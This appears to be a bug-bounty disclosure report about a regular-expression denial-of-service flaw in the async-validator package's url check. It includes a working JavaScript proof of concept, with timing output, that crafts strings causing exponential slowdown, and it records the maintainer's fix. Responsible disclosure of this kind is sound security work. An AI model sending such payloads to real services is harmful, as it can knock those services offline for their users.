Inefficient Regular Expression Complexity potentially leads to Denial of Service in yiminghe/async-validator

Valid

Reported on

Jun 16th 2022


Description

Inefficient Regular Expression Complexity of url regex could lead to a denial of service attack.

This report bypasses the fix in issue #300 by a well-formed payload '//a.b' + 'c1'.repeat(i) + 'a'. With only 36 characters payload could take 18672 ms time execution.

Proof of Concept

// PoC.js
var asyncValidator = require("async-validator")

const validator = new asyncValidator.default({
    v: {
        type: 'url',
    },
})


for (var i = 1; i <= 1000; i++) {
    var time = Date.now();
    var attack_str = '//a.b' + 'c1'.repeat(i) + 'a'
    validator.validate({
        v: attack_str,
    });
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}

Output

attack_str.length: 18: 0 ms
attack_str.length: 20: 1 ms
attack_str.length: 22: 1 ms
attack_str.length: 24: 6 ms
attack_str.length: 26: 20 ms
attack_str.length: 28: 82 ms
attack_str.length: 30: 283 ms
attack_str.length: 32: 1138 ms
attack_str.length: 34: 4938 ms
attack_str.length: 36: 18672 ms

Impact

Potentially causes a denial of service attack

Occurrences

We are processing your report and will contact the yiminghe/async-validator team within 24 hours. 10 days ago
Khang Vo (doublevkay) modified the report
9 days ago
We have contacted a member of the yiminghe/async-validator team and are waiting to hear back 9 days ago
yiminghe validated this vulnerability 9 days ago
Khang Vo (doublevkay) has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
yiminghe confirmed that a fix has been merged on 51c6b0 9 days ago
The fix bounty has been dropped
type.ts#L11 has been validated
to join this conversation